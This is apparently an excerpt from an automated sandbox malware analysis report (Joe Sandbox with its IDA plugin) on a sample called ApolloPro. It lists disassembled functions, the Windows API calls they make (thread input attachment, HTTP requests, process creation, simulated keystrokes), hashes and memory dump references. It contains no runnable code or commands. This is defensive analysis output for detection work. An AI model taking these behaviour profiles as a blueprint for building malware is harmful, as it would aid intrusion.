                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1704125052-3381328864
                                                                                              • Opcode ID: 2d1898285ad632405b439b668eb5ec377e1859fe61d65cc8ac123c872138656c
                                                                                              • Instruction ID: 0cf2404c231b17e4ad5fe7e853e79e4b66690df0938cd6fe7e98862f160379e6
                                                                                              • Opcode Fuzzy Hash: 2d1898285ad632405b439b668eb5ec377e1859fe61d65cc8ac123c872138656c
                                                                                              • Instruction Fuzzy Hash: E4113676248B12BAF6103722EC06DF6739FCF067A1F200216FE00A42D1FA616A115B7C
                                                                                              Function 006A8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 006A8FC1
                                                                                              • CoInitialize.OLE32(00000000), ref: 006A8FEE
                                                                                              • CoUninitialize.OLE32 ref: 006A8FF8
                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 006A90F8
                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 006A9225
                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,006C3BDC), ref: 006A9259
                                                                                              • CoGetObject.OLE32(?,00000000,006C3BDC,?), ref: 006A927C
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 006A928F
                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006A930F
                                                                                              • VariantClear.OLEAUT32(?), ref: 006A931F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 2395222682-0
                                                                                              • Opcode ID: 1b7a95cf1e7ff1ff780773966b95634272ac576babcf4fd233ead532bcd232d0
                                                                                              • Instruction ID: cdae1fee4afc49f2548c4da49f78fdc7c9e1359da0245a8ba3afc25e01bad756
                                                                                              • Opcode Fuzzy Hash: 1b7a95cf1e7ff1ff780773966b95634272ac576babcf4fd233ead532bcd232d0
                                                                                              • Instruction Fuzzy Hash: 96C12771204305AFD740EF64C884A6BB7EAFF8A348F10491DF58A9B251DB71ED05CBA2
                                                                                              Function 006919CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 006919EF
                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691A03
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00691A0A
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00690A67,?,00000001), ref: 00691A19
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00691A2B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00690A67,?,00000001), ref: 00691A44
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00690A67,?,00000001), ref: 00691A56
                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691A9B
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691AB0
                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00690A67,?,00000001), ref: 00691ABB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2156557900-0
                                                                                              • Opcode ID: 681a3eb710cc39bb7eaac9660d36866abaebc7bc8b50a315c01b0b5c822e67c3
                                                                                              • Instruction ID: a7b67cd0d5e3d369b6170d36baa11db17febd9fc1751965c198e29a6b18a6b22
                                                                                              • Opcode Fuzzy Hash: 681a3eb710cc39bb7eaac9660d36866abaebc7bc8b50a315c01b0b5c822e67c3
                                                                                              • Instruction Fuzzy Hash: E431BB71652209AFEF209F54DC48FBA77AFAB66355F206159F800CB690DBB49D80CB60
                                                                                              Function 0066C0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000008), ref: 0063260D
                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 00632617
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0063262C
                                                                                              • GetStockObject.GDI32(00000005), ref: 00632634
                                                                                              • GetClientRect.USER32(?), ref: 0066C0FC
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0066C113
                                                                                              • GetWindowDC.USER32(?), ref: 0066C11F
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0066C12E
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0066C140
                                                                                              • GetSysColor.USER32(00000005), ref: 0066C15E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3430376129-0
                                                                                              • Opcode ID: 9f5513f66129c106554bfac1ece45a1c5f0c2377573cfae0f97cddb6120c50bf
                                                                                              • Instruction ID: 0ca202565344b95a44c79009150996d5a348c6edb2c9a0aeefa1e835050c490d
                                                                                              • Opcode Fuzzy Hash: 9f5513f66129c106554bfac1ece45a1c5f0c2377573cfae0f97cddb6120c50bf
                                                                                              • Instruction Fuzzy Hash: 9A114431500605FFEB615FA4EC48FF9BBA3EB09321F544221FA66951A1CB310A51EB50
                                                                                              Function 0068AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnumChildWindows.USER32(?,0068B13A), ref: 0068B078
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChildEnumWindows
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 3555792229-1603158881
                                                                                              • Opcode ID: b2585ed6cddc3333c0e546b595163ae7a01f61b575e6691a8b02c36b1aa836a4
                                                                                              • Instruction ID: b9111514b29c5c4894e25b57f9a0c0f90ab8a1c1247152b6104d7b9edccaeb37
                                                                                              • Opcode Fuzzy Hash: b2585ed6cddc3333c0e546b595163ae7a01f61b575e6691a8b02c36b1aa836a4
                                                                                              • Instruction Fuzzy Hash: B5919370900605DBEB58EFA0C481BEEFB77BF05300F10821AED5AA7251DF306999DB95
                                                                                              Function 006331F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 0063327E
                                                                                                • Part of subcall function 0063218F: GetClientRect.USER32(?,?), ref: 006321B8
                                                                                                • Part of subcall function 0063218F: GetWindowRect.USER32(?,?), ref: 006321F9
                                                                                                • Part of subcall function 0063218F: ScreenToClient.USER32(?,?), ref: 00632221
                                                                                              • GetDC.USER32 ref: 0066D073
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0066D086
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0066D094
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0066D0A9
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0066D0B1
                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0066D13C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                              • String ID: U
                                                                                              • API String ID: 4009187628-3372436214
                                                                                              • Opcode ID: 9f4965ba692463bf9e95fa34679f26c463c2bd421b292b8e6049bf3090856151
                                                                                              • Instruction ID: aff7c3f4d2c762a01e80306cad2c2f2cefc9f477092a267701fd598c4b33684c
                                                                                              • Opcode Fuzzy Hash: 9f4965ba692463bf9e95fa34679f26c463c2bd421b292b8e6049bf3090856151
                                                                                              • Instruction Fuzzy Hash: 4171B130A04205EFCF218F64C884AFA7BB7FF4A364F144269ED559A365C7319D92DBA0
                                                                                              Function 006BC634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                                • Part of subcall function 00632714: GetCursorPos.USER32(?), ref: 00632727
                                                                                                • Part of subcall function 00632714: ScreenToClient.USER32(006F77B0,?), ref: 00632744
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000001), ref: 00632769
                                                                                                • Part of subcall function 00632714: GetAsyncKeyState.USER32(00000002), ref: 00632777
                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 006BC69C
                                                                                              • ImageList_EndDrag.COMCTL32 ref: 006BC6A2
                                                                                              • ReleaseCapture.USER32 ref: 006BC6A8
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 006BC752
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 006BC765
                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 006BC847
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                              • API String ID: 1924731296-2107944366
                                                                                              • Opcode ID: fde6c3a0762d222e0707f0050213aeac3eed8c1cf1dffbccd5831ddfd90dabbc
                                                                                              • Instruction ID: b9164ba222faf9f941be66faa87ebcc3eabfe9ad666459b267b6a891147b08b2
                                                                                              • Opcode Fuzzy Hash: fde6c3a0762d222e0707f0050213aeac3eed8c1cf1dffbccd5831ddfd90dabbc
                                                                                              • Instruction Fuzzy Hash: A0517C70604305AFD700EF14CC59FBA7BE6EB84310F10452DF9958B2E1DB70AA85CB96
                                                                                              Function 006A20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006A211C
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006A2148
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 006A218A
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006A219F
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006A21AC
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 006A21DC
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 006A2223
                                                                                                • Part of subcall function 006A2B4F: GetLastError.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B64
                                                                                                • Part of subcall function 006A2B4F: SetEvent.KERNEL32(?,?,006A1EE3,00000000,00000000,00000001), ref: 006A2B79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 2603140658-3916222277
                                                                                              • Opcode ID: c04df0fee142e8451f53890e16f6d112a7bef15830c9d07e2997c342cc230e54
                                                                                              • Instruction ID: 18310f4b2697e1903482fddea150c05d907e07e47c4ec423fa9f41a03b5387e7
                                                                                              • Opcode Fuzzy Hash: c04df0fee142e8451f53890e16f6d112a7bef15830c9d07e2997c342cc230e54
                                                                                              • Instruction Fuzzy Hash: 28418EB1580209BFEB16AF54CC99FFB7BAEEF09354F00411AFA049A241D7719E458FA4
                                                                                              Function 006A9330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,006C0980), ref: 006A9412
                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006C0980), ref: 006A9446
                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006A95C0
                                                                                              • SysFreeString.OLEAUT32(?), ref: 006A95EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                              • String ID:
                                                                                              • API String ID: 560350794-0
                                                                                              • Opcode ID: 0998bf0ae93ab63eb450d63796840e7bd517908df572adbaa4302c6f19a0c6db
                                                                                              • Instruction ID: d7ff79d7cb72e6d6363cb9658d61aeecbbc87c92d27fddad421629249e04fdc5
                                                                                              • Opcode Fuzzy Hash: 0998bf0ae93ab63eb450d63796840e7bd517908df572adbaa4302c6f19a0c6db
                                                                                              • Instruction Fuzzy Hash: C9F1FB71900119EFDF14EF94C884EAEB7BAEF45314F248458F516AB251DB31AE46CFA0
                                                                                              Function 006AFD7D Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006AFD9E
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006AFF31
                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006AFF55
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006AFF95
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006AFFB7
                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006B0133
                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006B0165
                                                                                              • CloseHandle.KERNEL32(?), ref: 006B0194
                                                                                              • CloseHandle.KERNEL32(?), ref: 006B020B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4090791747-0
                                                                                              • Opcode ID: 4e7573158e9ed3364ad7bbe3d1ef79c7526d3b460b764f15084b84d1a541e760
                                                                                              • Instruction ID: ef993d90bb86dc363c45d106e465e50975e71a3a1a39987e9f5550992714c988
                                                                                              • Opcode Fuzzy Hash: 4e7573158e9ed3364ad7bbe3d1ef79c7526d3b460b764f15084b84d1a541e760
                                                                                              • Instruction Fuzzy Hash: 1FE1AF712043419FD764EF24C891BAABBE6AF85310F14856DF8899B3A2CB31EC45CB56
                                                                                              Function 0069527C Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00693B8A,?), ref: 00694BE0
                                                                                                • Part of subcall function 00694BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00693B8A,?), ref: 00694BF9
                                                                                                • Part of subcall function 00694FEC: GetFileAttributesW.KERNEL32(?,00693BFE), ref: 00694FED
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 006952FB
                                                                                              • _wcscmp.LIBCMT ref: 00695315
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00695330
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 793581249-0
                                                                                              • Opcode ID: f1ceeb4ab018cf370081d2f453929a2215de2845e532aa480a5ae778ea4a6ddb
                                                                                              • Instruction ID: e2a217cbfc3bde8c571df1b5ef70ab16d1c9b406fdcfbb835dca4b8384ac8ff0
                                                                                              • Opcode Fuzzy Hash: f1ceeb4ab018cf370081d2f453929a2215de2845e532aa480a5ae778ea4a6ddb
                                                                                              • Instruction Fuzzy Hash: 545183B24083859BCB65DBA0DC81DDFB3EDAF85301F10091EB58AD3552EF34A689875A
                                                                                              Function 006B8C6A Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006B8D24
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 634782764-0
                                                                                              • Opcode ID: 0ebf3422bbe00fd03af0720c72b901bbe06d05421b257c344a9e4613db6b92a3
                                                                                              • Instruction ID: 300c667bad65febcabeaf5dacc223046023d3ce23a2ed960ee9c1e0a952e4c8e
                                                                                              • Opcode Fuzzy Hash: 0ebf3422bbe00fd03af0720c72b901bbe06d05421b257c344a9e4613db6b92a3
                                                                                              • Instruction Fuzzy Hash: 71518FB0640204BFEB649F28CC89BE97B6BAF05350F244516F614E72E2CB71E9D1DB54
                                                                                              Function 00632F42 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0066C638
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0066C65A
                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0066C672
                                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0066C690
                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0066C6B1
                                                                                              • DestroyIcon.USER32(00000000), ref: 0066C6C0
                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0066C6DD
                                                                                              • DestroyIcon.USER32(?), ref: 0066C6EC
                                                                                                • Part of subcall function 006BAAD4: DeleteObject.GDI32(00000000), ref: 006BAB0D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                              • String ID:
                                                                                              • API String ID: 2819616528-0
                                                                                              • Opcode ID: 8a75d44234edc7f69f49d08ea9e128d731359f9a6f4a5c83e5e16f7665071057
                                                                                              • Instruction ID: 78723097f1b8f41811b1904e3706f8c747c3ee877d69e16b6a488ff837c653a4
                                                                                              • Opcode Fuzzy Hash: 8a75d44234edc7f69f49d08ea9e128d731359f9a6f4a5c83e5e16f7665071057
                                                                                              • Instruction Fuzzy Hash: 1551677064060AEFDB24DF25CC55FBA7BB6EB48720F10452CF952D7290DB70A891DBA4
                                                                                              Function 0068A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0068B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0068B54D
                                                                                                • Part of subcall function 0068B52D: GetCurrentThreadId.KERNEL32 ref: 0068B554
                                                                                                • Part of subcall function 0068B52D: AttachThreadInput.USER32(00000000,?,0068A23B,?,00000001), ref: 0068B55B
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0068A246
                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0068A263
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0068A266
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0068A26F
                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0068A28D
